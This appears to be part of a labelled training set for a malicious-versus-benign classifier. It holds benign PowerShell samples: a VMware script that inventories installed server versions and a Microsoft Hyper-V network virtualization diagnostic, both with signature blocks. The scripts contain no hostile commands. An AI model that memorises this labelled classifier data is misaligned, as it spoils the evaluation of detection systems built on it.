/* MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAv+aQc2jeu+RdSjwwIjBp */
/* M+zCpyUuySE98orYWcLhKac9WKt2ms2uexuEDcQwH/MbpDgW61bGl20dq7J58soR */
/* 0uRf1gU8Ug9SH8aeFaV+vp+pVxZZVXKvaJNwwrK6dZlqczKU0RBEEC7fgvMHhOZ0 */
/* O21x4i0MG+4g1ckgHWMpLc7sXk7Ik/ghYZs06wXGXuxbGrzryc/NrDRAX7F6Zu53 */
/* yEioZldXn1RYjgwrt0+nMNlW7sp7XeOtyU9e5TXnMcvak17cjo+A2raRmECQecN4 */
/* x7axxLVqGDgDEI3Y1DekLgV9iPWCPhCRcKtVgkEy19sEcypukQF8IUzUvK4bA3Vd */
/* eGbZOjFEmjNAvwjXWkmkwuapoGfdpCe8oU85tRFYF/ckXEaPZPfBaYh2mHY9WV1C */
/* doeJl2l6SPDgohIbZpp0yt5LHucOY67m1O+SkjqePdwA5EUlibaaRBkrfsCUtNJh */
/* besz2cXfSwQAzH0clcOP9yGyshG3u3/y1YxwLEFgqrFjGESVGnZifvaAsPvoZKYz */
/* 0YkH4b235kOkGLimdwHhD5QMIR2yVCkliWzlDlJRR3S+Jqy2QXXeeqxfjT/JvNNB */
/* ERJb5RBQ6zHFynIWIgnffEx1P2PsIV/EIFFrb7GrhotPwtZFX50g/KEexcCPorF+ */
/* CiaZ9eRpL5gdLfXZqbId5RsCAwEAAaOCATowggE2MA8GA1UdEwEB/wQFMAMBAf8w */
/* HQYDVR0OBBYEFOzX44LScV1kTN8uZz/nupiuHA9PMB8GA1UdIwQYMBaAFEXroq/0 */
/* ksuCMS1Ri6enIZ3zbcgPMA4GA1UdDwEB/wQEAwIBhjB5BggrBgEFBQcBAQRtMGsw */
/* JAYIKwYBBQUHMAGGGGh0dHA6Ly9vY3NwLmRpZ2ljZXJ0LmNvbTBDBggrBgEFBQcw */
/* AoY3aHR0cDovL2NhY2VydHMuZGlnaWNlcnQuY29tL0RpZ2lDZXJ0QXNzdXJlZElE */
/* Um9vdENBLmNydDBFBgNVHR8EPjA8MDqgOKA2hjRodHRwOi8vY3JsMy5kaWdpY2Vy */
/* dC5jb20vRGlnaUNlcnRBc3N1cmVkSURSb290Q0EuY3JsMBEGA1UdIAQKMAgwBgYE */
/* VR0gADANBgkqhkiG9w0BAQwFAAOCAQEAcKC/Q1xV5zhfoKN0Gz22Ftf3v1cHvZqs */
/* oYcs7IVeqRq7IviHGmlUIu2kiHdtvRoU9BNKei8ttzjv9P+Aufih9/Jy3iS8UgPI */
/* TtAq3votVs/59PesMHqai7Je1M/RQ0SbQyHrlnKhSLSZy51PpwYDE3cnRNTnf+hZ */
/* qPC/Lwum6fI0POz3A8eHqNJMQBk1RmppVLC4oVaO7KTVPeix3P0c2PR3WlxUjG/v */
/* oVA9/HYJaISfb8rbII01YBwCA8sgsKxYoA5AY8WYIsGyWfVVa88nq2x2zm8jLfR+ */
/* cWojayL/ErhULSd+2DrZ8LaHlv1b0VysGMNNn3O3AamfV6peKOK5lDGCA3YwggNy */
/* AgEBMHcwYzELMAkGA1UEBhMCVVMxFzAVBgNVBAoTDkRpZ2lDZXJ0LCBJbmMuMTsw */
/* OQYDVQQDEzJEaWdpQ2VydCBUcnVzdGVkIEc0IFJTQTQwOTYgU0hBMjU2IFRpbWVT */
/* dGFtcGluZyBDQQIQBUSv85SdCDmmv9s/X+VhFjANBglghkgBZQMEAgEFAKCB0TAa */
/* BgkqhkiG9w0BCQMxDQYLKoZIhvcNAQkQAQQwHAYJKoZIhvcNAQkFMQ8XDTI0MDky */
/* MDA3MDExNFowKwYLKoZIhvcNAQkQAgwxHDAaMBgwFgQUZvArMsLCyQ+CXc6qisnG */
/* Txmcz0AwLwYJKoZIhvcNAQkEMSIEIK18OjatyIb5pBnG362LVEVvHvSg3ykn7blg */
/* Kw2Q/3zKMDcGCyqGSIb3DQEJEAIvMSgwJjAkMCIEINL25G3tdCLM0dRAV2hBNm+C */
/* itpVmq4zFq9NGprUDHgoMA0GCSqGSIb3DQEBAQUABIICAICEiG1UuJQKy97Gvj6W */
/* QcXPMKEN0E53Iz0xUKyV3FSTMOx26zjRcv8inPChihaxzigsdC8Bwhsb3BX3uFK7 */
/* DgDhY8wBAb/xPzOHNX95dAAMHEqJiCNNxpFLsDocgSMYSJXg+hGY0Y9EQNGWwCha */
/* vVRXTZeiAWTVBvU4wCR0fj3nmgF0I/iRw1QpmLArwl8B7KB4ikAaNSOp3lsItER5 */
/* tlleH/Zj36dYciqZZH1CoeGWiW5i/qJzTtsocKQPw9zokhI2nvm4mobsraIJOJ+/ */
/* tGXxhh9NzxOA0fE2oDkEdItuW7lVAjPPf8sJ98OhYgMYldeeAciQHpR/KFPJ5L4f */
/* q0J60cd2XB8lGT3Kkj74WQG13TdUgxraxK1mf42b4Dl1BsANW2x9pNKgeUBtC537 */
/* zGiC+uu8wD5taKu8ACKvOYwpdWMJScQcmtecTCsvqDens++BoLPesXlwGrFMrmG3 */
/* cY2ZDHmnNVpb65SKjhB0rMueeh0s0UblNF3R4o9yr9qsGmN/5X1C52oyZfmi6ORP */
/* q7a3tZiO7SQ6vv+Pf0G4OWCeParnl6X88UCif0ZL3QhEN3264zwXGrfr1Nu/8ayK */
/* 5iFK5fIemTiXMdeDoBkDWQXXnWEZvNp5PniIju0ag9Ee/6fRorMjayC6/fYEbCMV */
/* I3P8OFBC9A8a911O3EMHuVzk */
/* SIG # End signature block */
|
combined_dataset/train/non-malicious/sample_45_66.ps1
|
sample_45_66.ps1
|
#Copyright (C) 2020,2023 VMware, Inc. All rights reserved.
. ".\utils.ps1"
$versionstart="VERSIONSTART"
$versionend="VERSIONEND"
function getRegPropValue {
param($key, $regKey, $name)
$errorMessage = $null
try {
$value=""
if (Test-Path $regKey) {
$exp = "(Get-ItemProperty -Path `"$regKey`").$name"
$value = Invoke-Expression $exp -ErrorVariable errorMessage
}
Write-Host "$versionstart $key $value $versionend"
} catch [System.Exception] {
logError -function "getRegPropValue" -command $regKey -message $errorMessage
Write-Host "$versionstart $key $versionend"
}
}
# Oracel DB
getRegPropValue "oracle_db_versionregpath" "HKLM:\SOFTWARE\ORACLE\KEY_OraDb11g_home1" "ORACLE_HOME"
# MS-SQL DB
getRegPropValue "ms-sql_db_version9regpath" "HKLM:\SOFTWARE\Microsoft\Microsoft SQL Server\90\Tools\ClientSetup\CurrentVersion" "CurrentVersion"
getRegPropValue "ms-sql_db_version10regpath" "HKLM:\SOFTWARE\Microsoft\Microsoft SQL Server\100\Tools\ClientSetup\CurrentVersion" "CurrentVersion"
getRegPropValue "ms-sql_db_version11regpath" "HKLM:\SOFTWARE\Microsoft\Microsoft SQL Server\110\Tools\ClientSetup\CurrentVersion" "CurrentVersion"
getRegPropValue "ms-sql_db_version12regpath" "HKLM:\SOFTWARE\Microsoft\Microsoft SQL Server\120\Tools\ClientSetup\CurrentVersion" "CurrentVersion"
getRegPropValue "ms-sql_db_version13regpath" "HKLM:\SOFTWARE\Microsoft\Microsoft SQL Server\130\Tools\ClientSetup\CurrentVersion" "CurrentVersion"
getRegPropValue "ms-sql_db_version15regpath" "HKLM:\SOFTWARE\Microsoft\Microsoft SQL Server\150\Tools\ClientSetup\CurrentVersion" "CurrentVersion"
# VMware View
getRegPropValue "vmware_view_server_versionregpath" "HKLM:\SOFTWARE\VMware, Inc.\VMWare VDM" "productVersion"
# IIS
getRegPropValue "iis_versionregpath" "HKLM:\SOFTWARE\Microsoft\InetStp" "VersionString"
# SharePoint
getRegPropValue "sharepoint_serverrole12regpath" "HKLM:\SOFTWARE\Microsoft\Shared Tools\Web Server Extensions\12.0\WSS" "ServerRole"
getRegPropValue "sharepoint_serverrole14regpath" "HKLM:\SOFTWARE\Microsoft\Shared Tools\Web Server Extensions\14.0\WSS" "ServerRole"
getRegPropValue "sharepoint_serverrole15regpath" "HKLM:\SOFTWARE\Microsoft\Shared Tools\Web Server Extensions\15.0\WSS" "ServerRole"
getRegPropValue "sharepoint_serverrole16regpath" "HKLM:\SOFTWARE\Microsoft\Shared Tools\Web Server Extensions\16.0\WSS" "ServerRole"
# Exchange
getRegPropValue "exchange_version2003regpath" "HKLM:\SOFTWARE\Microsoft\Exchange\Setup" "ExchangeServerAdmin Version"
getRegPropValue "exchange_version2007regpath" "HKLM:\SOFTWARE\Microsoft\Exchange\v8.0\Setup" "MsiProductMajor"
getRegPropValue "exchange_version2010regpath" "HKLM:\SOFTWARE\Microsoft\ExchangeServer\v14\Setup" "MsiProductMajor"
getRegPropValue "exchange_version2013or2016regpath" "HKLM:\SOFTWARE\Microsoft\ExchangeServer\v15\Setup" "MsiProductMajor"
getRegPropValue "exchange_version2013or2016minorregpath" "HKLM:\SOFTWARE\Microsoft\ExchangeServer\v15\Setup" "MsiProductMinor"
# Active Directory
try {
$version = ((Get-ADObject (Get-ADRootDSE).SchemaNamingContext -Property objectVersion).objectVersion).toString("X")
Write-Host $versionstart "active_directory_version" "0x$version" $versionend
} catch [System.Exception] {
Write-Host "$versionstart "active_directory_version" $versionend"
}
# DB2
$command = "& db2level 2>`$null"
$pattern = 'DB2 v([\d\.]+)'
$errorMessage = $null
try {
$cmdOutput = Invoke-Expression $command -ErrorVariable errorMessage
$versionLine = $cmdOutput | Select-String -Pattern "DB2 v"
Write-Host "$versionstart db2_version $versionLine $versionend"
} catch [System.Exception] {
Write-Host "$versionstart db2_version $versionend"
}
# Get versions via command utils
$versionCommands = @{"Apache`.exe" = " -v";
"httpd`.exe" = " -v";
"mysqld`.exe" = " -V";
"`"VMware vCenter Site Recovery Manager`\bin`\vmware-dr`.exe`"" = " --version";
"sqlsrvr`.exe" = " -v"}
$pattern = '".*?"'
$processes = Get-WmiObject win32_service | select ProcessId, PathName
$processes | Where-object { $_.PathName -ne $null -and $_.PathName -ne "" } | Select-Object PathName, ProcessId | ForEach-Object {
if ($_.PathName -match $pattern) {
$path = $Matches[0].Trim('"')
$processId = $_.ProcessId
$command = $null
$versionCommands.Keys | ForEach-Object {
$regex = $_
if ($path -match $regex) {
$errorMessage = $null
try {
Write-Host $versionstart $processId
$command = "&`"" + $path + '"' + $versionCommands[$regex]
$command = $command + " 2>`$null"
Invoke-Expression $command -ErrorVariable errorMessage
Write-Host $versionend
} catch [System.Exception] {}
}
}
}
}
# Get nginix versions via command utils
$processIds = getListeningProcessIds
$processes = Get-Process | Where-Object { $_.ProcessName -eq "nginx" }
$processes | Where-object { $_.Path -ne $null -and $_.Path -ne "" } | Select-Object Path, Id | ForEach-Object {
if ($processIds.Contains($_.Id.ToString())) {
$path = $_.Path
$processId = $_.Id
try {
$command = $path + " -v" + " 2>&1"
$out = Invoke-Expression $command
$exceptionStr = $out.Exception.ToString()
$outputString = ($exceptionStr -split ":", 2)[-1].Trim()
Write-Host $versionstart $processId $outputString $versionend
} catch [System.Exception] {}
}
}
|
combined_dataset/train/non-malicious/sample_2_75.ps1
|
sample_2_75.ps1
|
#************************************************
# DC_HyperVNetworkVirtualization.ps1
# Version 1.0
# Date: May 2014
# Author: Boyd Benson (bbenson@microsoft.com) with assistance from Tim Quinn (tiquinn@microsoft.com)
# Description: PS cmdlets
# Called from: Networking Diags
#*******************************************************
Trap [Exception]
{
# Handle exception and throw it to the stdout log file. Then continue with function and script.
$Script:ExceptionMessage = $_
"[info]: Exception occurred." | WriteTo-StdOut
"[info]: Exception.Message $ExceptionMessage." | WriteTo-StdOut
$Error.Clear()
continue
# later use return to return the exception message to an object: return $Script:ExceptionMessage
}
Import-LocalizedData -BindingVariable ScriptVariable
function RunPS ([string]$RunPScmd="", [switch]$ft)
{
$RunPScmdLength = $RunPScmd.Length
"-" * ($RunPScmdLength) | Out-File -FilePath $OutputFile -append
"$RunPScmd" | Out-File -FilePath $OutputFile -append
"-" * ($RunPScmdLength) | Out-File -FilePath $OutputFile -append
if ($ft)
{
# This format-table expression is useful to make sure that wide ft output works correctly
Invoke-Expression $RunPScmd |format-table -autosize -outvariable $FormatTableTempVar | Out-File -FilePath $outputFile -Width 500 -append
}
else
{
Invoke-Expression $RunPScmd | Out-File -FilePath $OutputFile -append
}
"`n" | Out-File -FilePath $OutputFile -append
"`n" | Out-File -FilePath $OutputFile -append
"`n" | Out-File -FilePath $OutputFile -append
}
$sectionDescription = "Hyper-V Networking Virtualization"
# detect OS version and SKU
$wmiOSVersion = Get-CimInstance -Namespace "root\cimv2" -Class Win32_OperatingSystem
[int]$bn = [int]$wmiOSVersion.BuildNumber
$outputFile = $Computername + "_HyperVNetworking_HNV.TXT"
"====================================================" | Out-File -FilePath $OutputFile -append
"Hyper-V Networking Virtualization Settings" | Out-File -FilePath $OutputFile -append
"====================================================" | Out-File -FilePath $OutputFile -append
"Overview" | Out-File -FilePath $OutputFile -append
"----------------------------------------------------" | Out-File -FilePath $OutputFile -append
"Hyper-V Network Virtualization Configuration" | Out-File -FilePath $OutputFile -append
" 1. Overview stats" | Out-File -FilePath $OutputFile -append
" Number of VMs" | Out-File -FilePath $OutputFile -append
" Number of VM Network Adapters" | Out-File -FilePath $OutputFile -append
" Number of Virtual Switches" | Out-File -FilePath $OutputFile -append
" Number of NVLookupRecords" | Out-File -FilePath $OutputFile -append
" 2. HNV Hierarchical View" | Out-File -FilePath $OutputFile -append
" RoutingDomainID / VirtualSubnetID / VMs" | Out-File -FilePath $OutputFile -append
"====================================================" | Out-File -FilePath $OutputFile -append
"`n" | Out-File -FilePath $OutputFile -append
"`n" | Out-File -FilePath $OutputFile -append
"`n" | Out-File -FilePath $OutputFile -append
"`n" | Out-File -FilePath $OutputFile -append
"`n" | Out-File -FilePath $OutputFile -append
$vmmsCheck = Test-path "HKLM:\SYSTEM\CurrentControlSet\Services\vmms"
if ($vmmsCheck)
{
if ((Get-Service "vmms").Status -eq 'Running')
{
if ($bn -gt 9000)
{
"====================================================" | Out-File -FilePath $OutputFile -append
"Stats:" | Out-File -FilePath $OutputFile -append
"----------------------------------------------------" | Out-File -FilePath $OutputFile -append
# How many Virtual Machines?
$vms = Get-VM
$vmsCount = $vms.length
"Number of VMs : " + $vmsCount | Out-File -FilePath $OutputFile -append
# How many Virtual Network Adapters?
$vmNetworkAdapters = get-vmnetworkadapter *
$vmNetworkAdaptersCount = $vmNetworkAdapters.length
"Number of VMNetworkAdapters : " + $vmNetworkAdaptersCount | Out-File -FilePath $OutputFile -append
# How many Virtual Switches?
$vmSwitch = get-vmswitch *
$vmSwitchCount = $vmSwitch.length
"Number of VMSwitches : " + $vmSwitchCount | Out-File -FilePath $OutputFile -append
# How many Routing Domains (CustomerIDs)?
# Get-NetVirtualizationLookupRecord shows the CustomerID
# Get-NetVirtualizationCustomerRoute shows the RoutingDomainID
$nvLookupRecord = Get-NetVirtualizationLookupRecord
$nvLookupRecordCount = $nvLookupRecord.length
"Number of NVLookupRecords : " + $nvLookupRecordCount | Out-File -FilePath $OutputFile -append
"`n" | Out-File -FilePath $OutputFile -append
"`n" | Out-File -FilePath $OutputFile -append
"`n" | Out-File -FilePath $OutputFile -append
[array]$nvLrCustomerIdsAll = @()
[array]$nvLrVirtualSubnetIdsAll = @()
[array]$nvLrProviderAddressesAll = @()
[array]$nvLrCustomerAddressesAll = @()
foreach ($lookupRecord in $nvLookupRecord)
{
$nvLrCustomerIdsAll = $nvLrCustomerIdsAll + $lookupRecord.CustomerID # example: CustomerID : {066ADA42-D48D-4104-937F-6FDCFF48B4AB}
$nvLrVirtualSubnetIdsAll = $nvLrVirtualSubnetIdsAll + $lookupRecord.VirtualSubnetID # example: VirtualSubnetID : 641590
$nvLrProviderAddressesAll = $nvLrProviderAddressesAll + $lookupRecord.ProviderAddress
$nvLrCustomerAddressesAll = $nvLrCustomerAddressesAll + $lookupRecord.CustomerAddress
}
# find unique values
#$nvLrCustomerIds = $nvLrCustomerIdsAll | Sort-Object | Get-Unique
#$nvLrVirtualSubnetIds = $nvLrVirtualSubnetIdsAll | Sort-Object | Get-Unique
$nvLrProviderAddresses = $nvLrProviderAddressesAll | Sort-Object | Get-Unique
#$nvLrCustomerAddresses = $nvLrCustomerAddressesAll | Sort-Object | Get-Unique
#$nvLrCustomerIdsCount = $nvLrCustomerIds.length
#$nvLrVirtualSubnetIdsCount = $nvLrVirtualSubnetIds.length
#$nvLrProviderAddressesCount = $nvLrProviderAddresses.length
#$nvLrCustomerAddressesCount = $nvLrCustomerAddresses.length
# How many CustomerRoutes are there?
$nvCustomerRoute = Get-NetVirtualizationCustomerRoute
$nvCustomerRouteCount = $nvCustomerRoute.length
[array]$nvCrRoutingDomainIdsAll = @()
[array]$nvCrVirtualSubnetIdsAll = @()
foreach ($customerRoute in $nvCustomerRoute)
{
$nvCrRoutingDomainIdsAll = $nvCrRoutingDomainIdsAll + $customerRoute.RoutingDomainId
$nvCrVirtualSubnetIdsAll = $nvCrVirtualSubnetIdsAll + $customerRoute.VirtualSubnetId
}
# find unique CustomerIDs
$nvCrRoutingDomainIds = $nvCrRoutingDomainIdsAll | Sort-Object | Get-Unique
$nvCrRoutingDomainIdsCount = $nvCrRoutingDomainIds.length
# find unique VirtualSubnetIDs
$nvCrVirtualSubnetIds = $nvCrVirtualSubnetIdsAll | Sort-Object | Get-Unique
$nvCrVirtualSubnetIdsCount = $nvCrVirtualSubnetIdsAll.length
# How many Provider Addresses are there?
$nvPa = Get-NetVirtualizationProviderAddress
$nvPaCount = $nvPa.length
[array]$nvPaProviderAddressesAll = @()
foreach ($pa in $nvPa)
{
$nvPaProviderAddressesAll = $nvPaProviderAddressesAll + $pa.ProviderAddress
}
$nvPaProviderAddresses = $nvPaProviderAddressesAll | Sort-Object | Get-Unique
# Build an array that contains just the Provider Addresses from other hosts
# This array contains only PAs from this host: $nvPaProviderAddresses
# This array contains all PAs in the HNV scenario: $nvLrProviderAddresses
[array]$nvProviderAddressesOnOtherHosts = @()
foreach ($lrpa in $nvLrProviderAddresses)
{
if ($nvPaProviderAddresses -notcontains $lrpa)
{
$nvProviderAddressesOnOtherHosts = $nvProviderAddressesOnOtherHosts + $lrpa
}
}
"====================================================" | Out-File -FilePath $OutputFile -append
"HNV Hierarchical View" | Out-File -FilePath $OutputFile -append
" RoutingDomainID / VirtualSubnetID / VMs" | Out-File -FilePath $OutputFile -append
"====================================================" | Out-File -FilePath $OutputFile -append
"`n" | Out-File -FilePath $OutputFile -append
foreach ($rdid in $nvCrRoutingDomainIds)
{
# All of the following output is from the Get-NetVirtualizationCustomerRoute pscmdlet.
# Show the RDID
"`n"| Out-File -FilePath $OutputFile -append
"----------------------------------------------------" | Out-File -FilePath $OutputFile -append
"Routing Domain ID : " + $rdid | Out-File -FilePath $OutputFile -append
# Show the unique VSID(s) for this RDID
# [array]$nvPaLocalVms = @() # $nvPaLocalVms = $nvPaLocalVms + $lr.VMName
# [array]$nvPaRemoteVms = @() # $nvPaRemoteVms = $nvPaRemoteVms + $lr.VMName
foreach ($vsid in $nvCrVirtualSubnetIds)
{
foreach ($cr in $nvCustomerRoute)
{
if (($rdid -eq $cr.RoutingDomainID) -and ($vsid -eq $cr.VirtualSubnetID))
{
"`n" | Out-File -FilePath $OutputFile -append
" VirtualSubnetID : " + $vsid | Out-File -FilePath $OutputFile -append
# Show the VMs per VSID [this host]
foreach ($lr in $nvLookupRecord)
{
if ( (($rdid -eq $cr.RoutingDomainID) -and ($vsid -eq $cr.VirtualSubnetID)) -and (($rdid -eq $lr.CustomerID) -and ($vsid -eq $lr.VirtualSubnetID)) )
{
# Only show the VMs with ProviderAddresses on this machine (IPs in this array: $nvPaProviderAddresses)
foreach ($nvPaProviderAddress in $nvPaProviderAddresses)
{
if (($lr.ProviderAddress -eq $nvPaProviderAddress) -and ($lr.VMName -ne "GW") -and ($lr.VMName -ne "GW-External") -and ($lr.VMName -ne "DHCPExt.sys"))
{
" VM [THIS HOST] : " + $lr.VMName + " ; " + $lr.CustomerAddress + " ; " + $lr.ProviderAddress | Out-File -FilePath $OutputFile -append
}
}
}
}
# Show the VMs per VSID [other hosts]
foreach ($lr in $nvLookupRecord)
{
if ( (($rdid -eq $cr.RoutingDomainID) -and ($vsid -eq $cr.VirtualSubnetID)) -and (($rdid -eq $lr.CustomerID) -and ($vsid -eq $lr.VirtualSubnetID)) )
{
# Only show the VMs with ProviderAddresses on this machine (IPs in this array: $nvPaProviderAddresses)
foreach ($addr in $nvProviderAddressesOnOtherHosts)
{
if (($lr.ProviderAddress -eq $addr) -and ($lr.VMName -ne "GW") -and ($lr.VMName -ne "GW-External") -and ($lr.VMName -ne "DHCPExt.sys"))
{
" VM : " + $lr.VMName + " ; " + $lr.CustomerAddress + " ; " + $lr.ProviderAddress | Out-File -FilePath $OutputFile -append
}
}
}
}
foreach ($lr in $nvLookupRecord)
{
if ( (($rdid -eq $cr.RoutingDomainID) -and ($vsid -eq $cr.VirtualSubnetID)) -and (($rdid -eq $lr.CustomerID) -and ($vsid -eq $lr.VirtualSubnetID)) )
{
# Only show the VMs with ProviderAddresses on this machine (IPs in this array: $nvPaProviderAddresses)
foreach ($nvPaProviderAddress in $nvPaProviderAddresses)
{
if (($lr.ProviderAddress -eq $nvPaProviderAddress) -and ($lr.VMName -eq "GW"))
{
" HNV GW (Internal) : " + $lr.VMName + " ; " + $lr.CustomerAddress + " ; " + $lr.ProviderAddress | Out-File -FilePath $OutputFile -append
}
if (($lr.ProviderAddress -eq $nvPaProviderAddress) -and ($lr.VMName -eq "GW-External"))
{
" HNV GW (External) : " + $lr.VMName + " ; " + $lr.CustomerAddress + " ; " + $lr.ProviderAddress | Out-File -FilePath $OutputFile -append
}
}
}
}
# Show the VMs per VSID [other hosts]
foreach ($lr in $nvLookupRecord)
{
if ( (($rdid -eq $cr.RoutingDomainID) -and ($vsid -eq $cr.VirtualSubnetID)) -and (($rdid -eq $lr.CustomerID) -and ($vsid -eq $lr.VirtualSubnetID)) )
{
# Only show the VMs with ProviderAddresses on this machine (IPs in this array: $nvPaProviderAddresses)
foreach ($addr in $nvProviderAddressesOnOtherHosts)
{
if (($lr.ProviderAddress -eq $addr) -and ($lr.VMName -eq "GW"))
{
" HNV GW (Internal) : " + $lr.VMName + " ; " + $lr.CustomerAddress + " ; " + $lr.ProviderAddress | Out-File -FilePath $OutputFile -append
}
if (($lr.ProviderAddress -eq $addr) -and ($lr.VMName -eq "GW-External"))
{
" HNV GW (External) : " + $lr.VMName + " ; " + $lr.CustomerAddress + " ; " + $lr.ProviderAddress | Out-File -FilePath $OutputFile -append
}
}
}
}
}
}
}
"`n" | Out-File -FilePath $OutputFile -append
" SCVMM DHCP Server" | Out-File -FilePath $OutputFile -append
# Show the SCVMM Software DHCP Server
foreach ($vsid in $nvCrVirtualSubnetIds)
{
foreach ($cr in $nvCustomerRoute)
{
if (($rdid -eq $cr.RoutingDomainID) -and ($vsid -eq $cr.VirtualSubnetID))
{
# Show the HNV Tenant Gateway (Internal)
foreach ($lr in $nvLookupRecord)
{
if ( (($rdid -eq $cr.RoutingDomainID) -and ($vsid -eq $cr.VirtualSubnetID)) -and (($rdid -eq $lr.CustomerID) -and ($vsid -eq $lr.VirtualSubnetID)) )
{
if ($lr.VMName -eq "DHCPExt.sys")
{
" SCVMM DHCP Server : " + $lr.VMName + " ; " + $lr.CustomerAddress + " ; " + $lr.ProviderAddress | Out-File -FilePath $OutputFile -append
}
}
}
}
}
}
}
"`n" | Out-File -FilePath $OutputFile -append
"`n" | Out-File -FilePath $OutputFile -append
"`n" | Out-File -FilePath $OutputFile -append
}
else
{
"This server is not running WS2012 or WS2012 R2. Not running ps cmdlets." | Out-File -FilePath $OutputFile -append
}
}
else
{
"The `"Hyper-V Virtual Machine Management`" service is not running. Not running ps cmdlets." | Out-File -FilePath $OutputFile -append
}
}
else
{
"The `"Hyper-V Virtual Machine Management`" service does not exist. Not running ps cmdlets." | Out-File -FilePath $OutputFile -append
}
CollectFiles -filesToCollect $outputFile -fileDescription "Hyper-V Networking Settings" -SectionDescription $sectionDescription
# SIG # Begin signature block
# MIIoQwYJKoZIhvcNAQcCoIIoNDCCKDACAQExDzANBglghkgBZQMEAgEFADB5Bgor
# BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG
# KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCA6tQGN32CWR13D
# hh9bsxCPKhc+dOFR3Oxqz0iOMu9ZzqCCDXYwggX0MIID3KADAgECAhMzAAAEBGx0
# Bv9XKydyAAAAAAQEMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD
# VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p
# bmcgUENBIDIwMTEwHhcNMjQwOTEyMjAxMTE0WhcNMjUwOTExMjAxMTE0WjB0MQsw
# CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u
# ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB
# AQC0KDfaY50MDqsEGdlIzDHBd6CqIMRQWW9Af1LHDDTuFjfDsvna0nEuDSYJmNyz
# NB10jpbg0lhvkT1AzfX2TLITSXwS8D+mBzGCWMM/wTpciWBV/pbjSazbzoKvRrNo
# DV/u9omOM2Eawyo5JJJdNkM2d8qzkQ0bRuRd4HarmGunSouyb9NY7egWN5E5lUc3
# a2AROzAdHdYpObpCOdeAY2P5XqtJkk79aROpzw16wCjdSn8qMzCBzR7rvH2WVkvF
# HLIxZQET1yhPb6lRmpgBQNnzidHV2Ocxjc8wNiIDzgbDkmlx54QPfw7RwQi8p1fy
# 4byhBrTjv568x8NGv3gwb0RbAgMBAAGjggFzMIIBbzAfBgNVHSUEGDAWBgorBgEE
# AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQU8huhNbETDU+ZWllL4DNMPCijEU4w
# RQYDVR0RBD4wPKQ6MDgxHjAcBgNVBAsTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEW
# MBQGA1UEBRMNMjMwMDEyKzUwMjkyMzAfBgNVHSMEGDAWgBRIbmTlUAXTgqoXNzci
# tW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8vd3d3Lm1pY3Jvc29mdC5j
# b20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3JsMGEG
# CCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDovL3d3dy5taWNyb3NvZnQu
# Y29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3J0
# MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIBAIjmD9IpQVvfB1QehvpC
# Ge7QeTQkKQ7j3bmDMjwSqFL4ri6ae9IFTdpywn5smmtSIyKYDn3/nHtaEn0X1NBj
# L5oP0BjAy1sqxD+uy35B+V8wv5GrxhMDJP8l2QjLtH/UglSTIhLqyt8bUAqVfyfp
# h4COMRvwwjTvChtCnUXXACuCXYHWalOoc0OU2oGN+mPJIJJxaNQc1sjBsMbGIWv3
# cmgSHkCEmrMv7yaidpePt6V+yPMik+eXw3IfZ5eNOiNgL1rZzgSJfTnvUqiaEQ0X
# dG1HbkDv9fv6CTq6m4Ty3IzLiwGSXYxRIXTxT4TYs5VxHy2uFjFXWVSL0J2ARTYL
# E4Oyl1wXDF1PX4bxg1yDMfKPHcE1Ijic5lx1KdK1SkaEJdto4hd++05J9Bf9TAmi
# u6EK6C9Oe5vRadroJCK26uCUI4zIjL/qG7mswW+qT0CW0gnR9JHkXCWNbo8ccMk1
# sJatmRoSAifbgzaYbUz8+lv+IXy5GFuAmLnNbGjacB3IMGpa+lbFgih57/fIhamq
# 5VhxgaEmn/UjWyr+cPiAFWuTVIpfsOjbEAww75wURNM1Imp9NJKye1O24EspEHmb
# DmqCUcq7NqkOKIG4PVm3hDDED/WQpzJDkvu4FrIbvyTGVU01vKsg4UfcdiZ0fQ+/
# V0hf8yrtq9CkB8iIuk5bBxuPMIIHejCCBWKgAwIBAgIKYQ6Q0gAAAAAAAzANBgkq
# hkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x
# EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv
# bjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5
# IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEwOTA5WjB+MQswCQYDVQQG
# EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG
# A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQg
# Q29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIIC
# CgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+laUKq4BjgaBEm6f8MMHt03
# a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc6Whe0t+bU7IKLMOv2akr
